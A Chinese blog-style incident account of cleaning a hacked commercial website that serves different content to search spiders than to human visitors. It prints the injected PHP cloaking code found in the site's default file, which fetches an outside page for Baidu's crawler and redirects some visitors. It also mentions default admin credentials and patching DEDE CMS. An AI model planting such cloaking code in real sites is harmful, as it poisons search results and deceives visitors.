前天 QQ上收到一个朋友发来的消息,问我在吗,我一看是创业园时候的朋友,就聊了起来,他所在的公司的客户的网站被入侵了
但是他和我说 他的那个客户的网站不是这类的,和这个一点关系都没有,我打开了域名看到的实际内容是
是一个商业网站,这时候我的思路很清晰了,首先可以确定的是人和蜘蛛看到的内容不一样,这也是常用黑帽手法,这样可以获取大量的外链,为了进一步确认的我思路,我决定用蜘蛛模拟器试试结果如下图:
果然和我想的是一样的,这就证明了我的猜想,这种一般就是在网站根目录添加一个畸形文件,让这个畸形文件无法删除
并且优先级要高于网站本身的权限,或者是在网站的默认文件档里面加上一段代码,来调用他的文件,来判断来的人还是蜘蛛
如果是蜘蛛就给它显示博采的内容,如果是人就显示正常的页面,在了FTP帐号密码 进行一步检查,
发现用的是我的第二种手法, 在文件内加入了以下PHP代码
$file="http://www.***.com/seo/3.html?";
$referer=$_SERVER["HTTP_REFERER"];
$agent= strtolower($_SERVER["HTTP_USER_AGENT"]);
if(strstr($referer,"baidu")&&strstr($referer,"456"))
{
Header("Location: $url");
}
if ( ereg( "http://www.baidu.com/search/spider.htm",$agent ))
{
$content=file_get_contents($file);
echo $content;
exit;
}
? >
< ?php
这个代码明白的一看就知道了吧,我就不解释了,在根目录还发现一个加密的文件,那个文件貌似是博采的网页内容,命名为index.asp.asp 接下来就是替换INDEX.PHP文件 然后删除相关后门,打上补丁,
但是当我拿到网站后台的帐号密码的时候我崩溃了,密码竟然 是默认的,帐号也是默认的,程序是DEDE 存在安全漏洞
修补漏洞 用DEDE的安全检测工具稍微检查了一下木马和WEBSHELL 没有多余发现,打上补丁收工,再用蜘蛛模拟器查看
网站内容和蜘蛛的爬行内容一致了 接下来就是@蜘蛛了 让蜘蛛过来爬 收录并更新快照 什么怎么@蜘蛛吗? 这你都不会吗?
那我也不会 嘿嘿!
